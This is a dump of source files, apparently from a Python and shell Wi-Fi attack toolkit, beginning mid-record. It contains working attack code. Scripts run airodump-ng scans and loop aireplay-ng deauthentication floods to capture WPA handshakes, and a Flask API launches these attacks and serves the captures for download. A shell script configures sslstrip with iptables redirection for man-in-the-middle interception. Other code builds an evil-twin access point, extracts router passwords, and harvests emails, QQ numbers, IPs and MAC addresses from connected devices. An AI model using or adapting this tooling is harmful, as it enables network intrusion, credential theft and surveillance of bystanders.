9\n conf['Oct'] = 10\n conf['Nov'] = 11\n conf['Dec'] = 12\n origintime = datetime.datetime(int(fac.group(3)), conf[fac.group(1)], int(fac.group(2)), int(fac.group(4)), int(fac.group(5)), int(fac.group(6)))\n # unixtime = time.(int(fac[2]), conf[fac[0]], int(fac[1]), int(fac[3]), int(fac[4]), int(fac[5]))\n unixtime = int(time.mktime(origintime.timetuple()))\n print unixtime\n print origintime\n # for line in lines:\n # connect = re_connect.search(line)\n # # discon = re_disconnect.match(line)\n # if connect:\n # print connect.group(1)\n # disconnect = re_disconnect.search(line)\n # if disconnect:\n 
# print disconnect.group(1)\n # print type(disconnect.group(1))\n # print connect\n# nowtime = re_time.findall(line)\n# usragent = re_usragen.findall(line)\n# email = re_mailcount.findall(line)\n# qq = re_qqnumber.findall(line)\n# ip = re_ipnumber.findall(line)\n# mac = re_mac.findall(line)\n# gif = re_gif.findall(line)\n# net = re_net.findall(line)\n# tmp['tmie'] = nowtime\n# tmp['usragent'] = usragent\n# tmp['email'] = email\n# tmp['qq'] = qq\n# tmp['ip'] = ip\n# tmp['macaddress'] = mac\n# tmp['gifsources'] = gif\n# tmp['netaddress'] = net\n# with open('outpufile.json', 'a') as outfile:\n# json.dump(tmp, outfile)\n# insertintomongo(tmp)\n# 终端采集数据\n# def theterminaldata():\n# term = {}\n# # 设备mac\n# term['device_mac'] =\n# # 厂商\n# term['company'] =\n# # 上网时间\n# term['on_net_time'] =\n# # 离开时间\n# term['off_net_time'] =\n# # 信号强度\n# term['signal_strength']=\n# # 数据包\n# term['data_pack'] =\n\n# def thewifidata():\n# wifi = {}\n# # mac\n# wifi['bssid'] =\n# # essid wifi名称\n# wifi['essid'] =\n# # rssi 信号强度\n# wifi['rssi'] =\n# # 握手包\n# wifi['handshake_data'] =\n# # CH 频段\n# wifi['CH']=\n# # MB 带宽\n# wifi['MB']=\n# # ENC加密体系\n# wifi['ENC']=\n# #CIPHER加密算法\n# wifi['CIPHER']=\n\nif __name__ == '__main__':\n log = os.path.join(fileDir, '..', 'script', 'teminal.log')\n getthephoneinformation(log)"
},
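The hand-built month table in the record above (conf['Jan'] = 1 through conf['Dec'] = 12) reimplements what datetime.strptime's %b directive already does; the same timestamp conversion fits in two lines, assuming an English/C locale so %b matches abbreviations like 'Feb':

```python
import time
import datetime

stamp = "Feb 07, 2018 13:45:12"  # hypothetical line in the format the regex expects
origintime = datetime.datetime.strptime(stamp, "%b %d, %Y %H:%M:%S")
unixtime = int(time.mktime(origintime.timetuple()))
print(unixtime)
```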
{
"alpha_fraction": 0.5979228615760803,
"alphanum_fraction": 0.6350148320198059,
"avg_line_length": 24.961538314819336,
"blob_id": "9278f52ff58e7168fabab13a30bedb608186d107",
"content_id": "0d764e32968f5a2b4821642be61de22932c20d67",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 26,
"path": "/terminal/allconfig.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nconf ={}\nconf['mongohost'] = \"localhost\"\nconf['mongoport'] = 27017\nconf['redishost'] = \"localhost\"\nconf['redisport'] = 6379\nconf['hostapdlog'] = \"/home/hostapd.log\"\nconf['dhcplog'] = \"/home/dhcp.log\"\nconf['terminal'] = \"/home/terminal.log\"\nconf['hostapdconf'] = \"/etc/hostapd/hostapd.conf\"\nconf['hostapdshell'] = \"/home/starthostapd.sh\"\nconf['dhcpshell'] = \"/home/startdhcp.sh\"\nconf['routershell'] = \"/home/startrouter.sh\"\nconf['wifishell'] = \"/home/getallwifi.sh\"\nconf['Jan'] = 1\nconf['Feb'] = 2\nconf['Mar'] = 3\nconf['Apr'] = 4\nconf['May'] = 5\nconf['Jun'] = 6\nconf['Jul'] = 7\nconf['Aug'] = 8\nconf['Sep'] = 9\nconf['Oct'] = 10\nconf['Nov'] = 11\nconf['Dec'] = 12"
},
{
"alpha_fraction": 0.5721295475959778,
"alphanum_fraction": 0.5907752513885498,
"avg_line_length": 22.18181800842285,
"blob_id": "20ee36dd41194a5abc59ffa0f6909a1ab706af43",
"content_id": "2933143b0e4b4fd1d5b60113c79373dfefd6604a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 44,
"path": "/pubfunc/getrouter.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "\"\"\"\n正则表达式匹配路由器用户名和密码\nby swm 2018/01/05\n\"\"\"\nimport re\nimport datetime\n\n\n# 时间转换str datetime to datetime\ndef str2datetime(strdate):\n dt = datetime.datetime.strptime(strdate, \"%Y-%m-%d %H:%M:%S\")\n return dt\n\n\ndef getrouter(filepath):\n with open(filepath, 'r') as f:\n data = f.read()\n # 匹配dhcp的host\n re_host = re.compile(r'host:\\s([\\d.]+[\\d.]+[\\d.]+[\\d])')\n # 匹配用户名\n re_usr = re.compile(r'login:\\s(\\w+)')\n # 匹配密码\n re_pwd = re.compile(r'password:\\s(\\S+)')\n # 匹配成功的时间\n re_time =re.compile(r'\\d{4}\\-\\d{2}\\-\\d{2}\\s\\d{2}\\:\\d{2}\\:\\d{2}')\n host = re_host.findall(data)\n usr = re_usr.findall(data)\n pwd = re_pwd.findall(data)\n time = re_time.findall(data)\n # 转换为datetime格式\n starttime = str2datetime(time[0])\n endtime = str2datetime(time[1])\n print(data)\n print(host)\n print(usr)\n print(pwd)\n print(time)\n print(starttime, type(starttime))\n print(endtime, type(endtime))\n\n\nif __name__ == '__main__':\n filepath = 'router.txt'\n getrouter(filepath)"
},
{
"alpha_fraction": 0.655063271522522,
"alphanum_fraction": 0.6645569801330566,
"avg_line_length": 27.044445037841797,
"blob_id": "1b1f1b2e726249b805062432184cc8d42a394de3",
"content_id": "1db09354a4da2468accd0faa42d97ec0b036317f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1320,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 45,
"path": "/terminal/mongooptions.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\nmongodb options\ncreate by swm\n2018/1/15\n\"\"\"\nimport pymongo\nimport datetime\nfrom terminal.allconfig import conf\n\n\n# 将tshark获取的数据存入mongodb\ndef insertintoterminal(terminal):\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n information = db.terminal\n information.insert(terminal)\n print datetime.datetime.now(), 'insert terminal success'\n\n\n# 后面再增加其他方法\ndef insertmoibiinfo(mobi):\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n information = db.mobi\n information.insert(mobi)\n # print datetime.datetime.now(), 'insert mobi success'\n return\n\n\n# 查询手机信息\ndef mobidata():\n res = []\n client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])\n db = client.swmdb\n mobi = db.mobi\n # 1升序,-1降序\n cursor = mobi.find({}, {\"_id\": 0}).sort(\"offlinetime\", -1)\n for el in cursor:\n online = datetime.datetime.fromtimestamp(int(el['onlinetime'])).strftime('%Y-%m-%d %H:%M:%S')\n offline = datetime.datetime.fromtimestamp(int(el['offlinetime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['onlinetime'] = online\n el['offlinetime'] = offline\n res.append(el)\n return res\n\n\n"
},
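mobidata() above sorts every query by offlinetime descending; with no index, mongod sorts in memory on each call, so creating the index once at startup is cheap and idempotent. A sketch reusing the conf dict from allconfig.py (pymongo 3.6, as pinned in requirements.txt, provides create_index):

```python
import pymongo

from terminal.allconfig import conf

client = pymongo.MongoClient(host=conf['mongohost'], port=conf['mongoport'])
# descending index matching the sort in mobidata(); safe to call repeatedly
client.swmdb.mobi.create_index([("offlinetime", pymongo.DESCENDING)])
```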
{
"alpha_fraction": 0.5657492280006409,
"alphanum_fraction": 0.5703364014625549,
"avg_line_length": 28.20535659790039,
"blob_id": "7a12b638b4574c504da24f4b4d2433a7484bcea9",
"content_id": "ab847772c44a61d82d6a1c749055e9bc3862458b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3288,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 112,
"path": "/terminal/getallwifiname.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n使用iwconfig获取插入的网卡\ncreate by swm\n2018/03/07\n\"\"\"\nimport re\nfrom subprocess import Popen, PIPE\n\nfrom terminal.allconfig import conf\n\n\nclass IWWIFI:\n\n def __init__(self):\n self.shell = 'iwconfig'\n self.hostapdconf = conf['hostapdconf']\n self.dhcpsh = conf['dhcpshell']\n self.wifishell = conf['wifishell']\n\n def getallname(self):\n p = Popen('iwconfig', stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n re_wlanname = re.compile(r'wlan\\d')\n wlanname = re_wlanname.findall(out)\n return wlanname\n\n def changehostapdconf(self, wlanname):\n oldf = open(self.hostapdconf, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.hostapdconf, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def changedhcpconf(self, wlanname):\n oldf = open(self.dhcpsh, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.dhcpsh, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def changwifishell(self, wlanname):\n oldf = open(self.wifishell, 'r')\n oldsrc = oldf.read()\n re_wlanname = re.compile(r'wlan\\d')\n newsrc = re_wlanname.sub(r'{}'.format(wlanname), oldsrc)\n oldf.close()\n wopen = open(self.wifishell, 'w')\n wopen.write(newsrc)\n wopen.close()\n return\n\n def rename(self, wlanname):\n self.changehostapdconf(wlanname)\n self.changedhcpconf(wlanname)\n return\n\n def changewificonf(self, name, pwd):\n oldf = open(self.hostapdconf, 'r')\n oldsrc = oldf.read()\n re_name = re.compile(r'\\bssid\\=.+')\n re_pwd = re.compile(r'wpa\\_passphrase\\=.+')\n name = re_name.sub(r'ssid={}'.format(name), oldsrc)\n pwd = re_pwd.sub(r'wpa_passphrase={}'.format(pwd), name)\n oldf.close()\n wopen = open(self.hostapdconf, 'w')\n wopen.write(pwd)\n wopen.close()\n return\n\n\n# if __name__ == '__main__':\n # iw = IWWIFI()\n # iw.changewificonf('swm', '454545sw')\n # import os\n # file = os.path.dirname(os.path.realpath(__file__))\n # hostconf = os.path.join(file, '..', 'script', 'hostapd.conf')\n # # # print hostconf\n # src = open(hostconf, 'r')\n # content = src.read()\n # re_name = re.compile(r'\\bssid\\=(.+)')\n # wifiname = re_name.findall(content)\n # print wifiname\n # re_name = re.compile(r'\\bssid\\=.+')\n # re_pwd = re.compile(r'wpa\\_passphrase\\=.+')\n # name = re_name.sub(r'ssid=swm', content)\n # pwd = re_pwd.sub(r'wpa_passphrase=1234987', name)\n # print name\n # print pwd\n # src.close()\n # wopen = open(hostconf, 'w')\n # wopen.write(pwd)\n # wopen.close()\n # for line in content:\n # name = re_name.search(content)\n # pwd = re_pwd.search(content)\n # if name:\n # print name.group()\n # if pwd:\n # print pwd.group()\n # name = re_name.findall(content)\n # pwd = re_pwd.findall(content)\n # print name\n # print pwd"
},
{
"alpha_fraction": 0.489130437374115,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 44.75,
"blob_id": "304cc63cb8e0c660d11f91ac9caebd1405912fef",
"content_id": "56642114372d4ed2147d044d1e91750de04ca208",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 4,
"path": "/shelldic/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 10.0.0.1 netmask 255.255.255.0\nifconfig wlan0 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan0 &> dhcp.log\n\n"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 13.5,
"blob_id": "8fe8e9d24a460ae54281c8ce6664a3cb25143266",
"content_id": "0233cc18daa8409bff023e3d78ac6036ef80e8f2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 14,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "pymongo==3.6.0\nredis==2.10.6"
},
{
"alpha_fraction": 0.5069904327392578,
"alphanum_fraction": 0.5154525637626648,
"avg_line_length": 27.9255313873291,
"blob_id": "41a64b1f6aacca06207cbcaeca359b709fc49a3e",
"content_id": "6e75629d72f02baecbc5143b84de96753302da37",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2832,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 94,
"path": "/wifilist/getwifilist.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n获取wifi list\n存入mongodb\ncreate by swm\n2018/1/23\n\"\"\"\n\nimport re\nimport pymongo\nimport datetime\nimport time\nfrom subprocess import call\n# 外部引用\n\n\nclass WIFINAME:\n\n def __init__(self):\n self.logpath = \"/home/execute.log\"\n self.mongohost = \"localhost\"\n self.mongoport = 27017\n\n def insertintomongo(self, wifilist):\n try:\n client = pymongo.MongoClient(self.mongohost, self.mongoport)\n except:\n self.writelog('{} canot connect mongodb'.format(datetime.datetime.now()))\n db = client.swmdb\n information = db.wifilist\n try:\n information.insert(wifilist)\n except:\n wifilist['ESSID'] = 'errorcode'\n information.insert(wifilist)\n self.writelog(\"{} error code, have replace\".format(datetime.datetime.now()))\n return\n\n def writelog(self, log):\n with open(self.logpath, \"a\") as file:\n file.write(log)\n file.close()\n\n def getwifilist(self, text):\n wifilist = []\n re_start = re.compile(r'BSSID\\s+STATION\\s+PWR\\s+Rate\\s+Lost\\s+Frames\\s+Probe')\n re_end = re.compile(r'BSSID\\s+PWR\\s+Beacons\\s+\\#Data\\, \\#\\/s\\s+CH\\s+MB\\s+ENC\\s+CIPHER AUTH ESSID')\n copy = False\n # 倒着读字符串,找到符合条件的行加入列表然后再筛选\n for line in reversed(text.splitlines()):\n start = re_start.search(line)\n end = re_end.search(line)\n if start:\n copy = True\n continue\n elif end:\n copy = False\n if len(wifilist) > 0:\n break\n elif copy:\n wifilist.append(line)\n # 将信息采集后就可以删除log,不在需要log\n # call(\"rm -f {}\".format(self.logpath), shell=True)\n return wifilist\n\n def startcollectinfo(self, wifilist):\n for line in wifilist:\n # 空格分割\n str = line.split(' ')\n # 去除空字符串\n list = filter(None, str)\n if len(list) <= 1:\n continue\n else:\n tmp = {}\n tmp['BSSID'] = list[0]\n tmp['PWR'] = list[1]\n tmp['Beacons'] = list[2]\n tmp['Data'] = list[3]\n tmp['s'] = list[4]\n tmp['CH'] = list[5]\n tmp['MB'] = list[6]\n tmp['unixtime'] = int(time.time())\n tmp['ESSID'] = list[-1]\n self.insertintomongo(tmp)\n self.writelog(\"{} Complete store the info.\".format(datetime.datetime.now()))\n return\n\n\n# if __name__ == '__main__':\n# wifi = WIFINAME()\n# wifilist = wifi.getwifilist()\n# # print wifilist\n# wifi.startcollectinfo(wifilist)"
},
{
"alpha_fraction": 0.67136150598526,
"alphanum_fraction": 0.7417840361595154,
"avg_line_length": 52.25,
"blob_id": "98e8528eabeb068c86409db02e85de46536f4c6c",
"content_id": "2c95c5de23750389c10c9160934bade362d8cd4a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 4,
"path": "/shelldic/startsslstrip.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "iptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" > /proc/sys/net/ipv4/ip_forward\niptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000\nsslstrip -l 10000\n"
},
{
"alpha_fraction": 0.48255813121795654,
"alphanum_fraction": 0.7267441749572754,
"avg_line_length": 41.75,
"blob_id": "5ae5b4b9df69507adf470918dfb6058d9e30afb2",
"content_id": "981e23ea0bd2adb356c0d618a7c6ae7233322038",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 172,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 4,
"path": "/homebak/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan1 10.0.0.1 netmask 255.255.255.0\nifconfig wlan1 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan1 \n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7452830076217651,
"avg_line_length": 52,
"blob_id": "09906d1f230503b4b722e1662db166b1483d408c",
"content_id": "5c40cc280bfcaf4cd50bd6c52336913ae71654c0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 2,
"path": "/homebak/startrouter.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "iptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" >/proc/sys/net/ipv4/ip_forward\n"
},
{
"alpha_fraction": 0.558613657951355,
"alphanum_fraction": 0.5840978622436523,
"avg_line_length": 27,
"blob_id": "e96ece26b13a6a9d0738bbb8b4f4935b5c4000a4",
"content_id": "17d4fb6a60c8072e166ddad8a82afde927c949f8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/wifilist/mongoquery.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\nget the mongodata\ncreate by swm\n2018/02/26\n\"\"\"\nimport pymongo\nimport datetime\nimport time\nimport json\n\n\ndef getquerydate():\n # today\n today = time.mktime(datetime.date.today().timetuple())\n res = []\n client = pymongo.MongoClient(host=\"localhost\", port=27017)\n db = client.swmdb\n collection = db.wifilist\n # cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort({\"unixtime\": -1})\n # cursor = collection.find({\"unixtime\": {\"$lte\": int(today)}}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n cursor = collection.find({}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n count = 0\n for el in cursor:\n havedate = datetime.datetime.fromtimestamp(int(el['unixtime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['unixtime'] = havedate\n res.append(el)\n count += 1\n if count > 100:\n break\n jsondata = json.dumps(res)\n return jsondata\n\n# if __name__ == '__main__':\n# print getquerydate()\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.796875,
"avg_line_length": 20,
"blob_id": "ceed98a952c7a396ac5fadc53334a7075faf28d9",
"content_id": "26db422d30348dfb07a67d294252876a70740b9e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 3,
"path": "/shelldic/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 up \nairmon-ng start wlan0 \nairodump-ng wlan0mon \n"
},
{
"alpha_fraction": 0.7558139562606812,
"alphanum_fraction": 0.7906976938247681,
"avg_line_length": 20,
"blob_id": "f1de678c38e1bfc87b90e9f15a9b8af5141ddb85",
"content_id": "46fb7da5a11310f6a62e816bb78f345999b832d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 86,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 4,
"path": "/homebak/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan1 up \nairmon-ng check kill\nairmon-ng start wlan1 \nairodump-ng wlan1mon \n\n"
},
{
"alpha_fraction": 0.6489419341087341,
"alphanum_fraction": 0.6576234698295593,
"avg_line_length": 31.060869216918945,
"blob_id": "f4e5cafc2841b543fb745c530150176a193b6b8f",
"content_id": "7570a75ef4af8ea1b241d265d88c0c78315a9069",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3748,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 115,
"path": "/app.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nfrom flask import Flask, request, Response, send_from_directory, make_response\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport redis\ngevent.monkey.patch_all()\n# 内部引用\nfrom wifilist.startwifiserver import CONTROL\nfrom wifilist.getwifihandshake import HANDSHAKE\nfrom wifilist.routeattack import ROUTE\nfrom terminal.getallwifiname import IWWIFI\nfrom wifilist.wifiswitch import SWITCH\napp = Flask(__name__)\n\n\n# @app.route('/')\n# def root():\n# return render_template('index.html')\n\n\n# @app.route('/<string:page_name>/')\n# def analyse(page_name):\n# return render_template(page_name)\n\n\n# @app.route('/api/mongodata', methods=['get'])\n# def sendmongodata():\n# responsedata = getquerydate()\n# return Response(responsedata, mimetype=\"application/json\")\n# 选择哪张wifi去运行wifi扫描\[email protected]('/api/whichwlan', methods=['post'])\ndef choosewlan():\n args = json.loads(request.data)\n wlan = args['wlanname']\n iw = IWWIFI()\n iw.changwifishell(wlan)\n info = {\"changed\": 1}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/startcollect', methods=['post'])\ndef starttheserver():\n # 搜集并存储扫描的wifi信息\n args = json.loads(request.data)\n # 类型强转确保int\n seconds = int(args['seconds'])\n if int(args['start']) == 1:\n control = CONTROL(seconds)\n thread1 = threading.Thread(target=control.start)\n thread2 = threading.Thread(target=control.killshell)\n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"something wrong with you!\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/handshake', methods=['post'])\ndef collecthandshake():\n args = json.loads(request.data)\n handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'], args['wlanname'])\n router = ROUTE(args['mac'], args['wlanname'], args['ch'])\n t1 = threading.Thread(target=handshake.starthandshake)\n t2 = threading.Thread(target=router.start)\n t1.start()\n t2.start()\n t2.join()\n t1.join()\n from terminal.allconfig import conf\n r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n get = r.hget(\"handshake\", \"GET\")\n if int(get) == 1:\n handshake.mvfile()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"Failed get wifi handshake\"}\n r.delete(\"handshake\")\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/download/<wifi>', methods=['GET'])\ndef download(wifi):\n filepath = '/home/wifihandshakedata/'\n filename = '{}-01.cap'.format(wifi)\n # 中文\n response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))\n # except:\n # info = {\"complete\": 0, \"error\": \"No such file, scan wifi failed\"}\n # return Response(json.dumps(info), mimetype=\"application/json\")\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n\[email protected]('/api/shutdown', methods=['post'])\ndef shutdownwifi():\n args = json.loads(request.data)\n wlanname = args['wlanname']\n switch = SWITCH()\n info = switch.stopwifi(wlanname)\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8014), app)\n try:\n print(\"Start at \" + http_server.server_host +\n ':' + str(http_server.server_port))\n 
http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit...')"
},
{
"alpha_fraction": 0.8072289228439331,
"alphanum_fraction": 0.8192771077156067,
"avg_line_length": 19.75,
"blob_id": "e478947702bcd3385025ac58b17c0ec4a1027a45",
"content_id": "a4f86aeda4f515abe950d56885f5a9fe6e117a40",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 4,
"path": "/homebak/starthostapd.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "rfkill unblock wlan\nnmcli radio wifi off\nsleep 2\nhostapd /etc/hostapd/hostapd.conf\n"
},
{
"alpha_fraction": 0.8157894611358643,
"alphanum_fraction": 0.8157894611358643,
"avg_line_length": 24.66666603088379,
"blob_id": "fa46c03d76fb05f3e283d41cd1d666ef3a9c99f7",
"content_id": "e73ae71426c834eaa9e066b904fd7c256c47f02f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 3,
"path": "/script/starthostapd.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "nmcli radio wifi off \nrfkill unblock wlan \nhostapd /etc/hostapd/hostapd.conf"
},
{
"alpha_fraction": 0.5540962815284729,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 28.629629135131836,
"blob_id": "92573fd1ae65ccf5c7f83384eeb01f6296861ad3",
"content_id": "a0f9c4e7d11737d2464076dab381ef5f1b870286",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1747,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 54,
"path": "/wifilist/routeattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nimport subprocess\nimport re\nimport time\n\"\"\"\n不断执行route攻击,搜集握手包\n\"\"\"\nfiledir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass ROUTE:\n\n def __init__(self, mac, wlanname, ch):\n # self.routeattack = os.path.join(filedir, 'routrattack', 'routeattack.log')\n self.logpath = \"/home/execute.log\"\n self.mac = mac\n self.limit = 5\n self.wlanname = wlanname\n self.ch = ch\n\n # 保存shell的所有输出\n def writeinfotolog(self):\n # 改变网卡的信道,使网卡适应目标wifi的信道\n iwcmd = 'iwconfig {}mon channel {}'.format(self.wlanname, self.ch)\n subprocess.call(iwcmd, shell=True)\n cmd = 'aireplay-ng -0 10 -a {} {}mon'.format(self.mac, self.wlanname)\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n return output\n\n def killairodump(self):\n subprocess.call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n return\n\n def start(self):\n count = 0\n re_route = re.compile(r'Sending DeAuth to broadcast \\-\\- BSSID\\: \\[{}\\]'.format(self.mac))\n while True:\n # 防止主程序结束后还在自己运行\n if count > self.limit:\n break\n count += 1\n strtext = self.writeinfotolog()\n router = re_route.search(strtext)\n # 泛洪攻击没有成功则停0.5s继续\n if router:\n time.sleep(0.2)\n else:\n # 泛洪攻击成功后停止程序\n time.sleep(2)\n break\n self.killairodump()\n return"
},
{
"alpha_fraction": 0.5890411138534546,
"alphanum_fraction": 0.7123287916183472,
"avg_line_length": 9.571428298950195,
"blob_id": "53f50b94ceb8bc3e7c7b0304d67a39d03cb02e31",
"content_id": "e4d8935c322914492825ff74925147cf1265e5c4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 7,
"path": "/attack/__init__.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n攻击目标wifi,并且伪造一个完全相似的wifi\ncreate by swm\n2018/03/23\n\"\"\""
},
{
"alpha_fraction": 0.5719424486160278,
"alphanum_fraction": 0.7338129281997681,
"avg_line_length": 45.33333206176758,
"blob_id": "65c92957fc17e14d3024a1328b3e65b042bf7d52",
"content_id": "1ec991b171e82ad59c294136b276162285a99d6d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 278,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 6,
"path": "/script/startdhcp.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
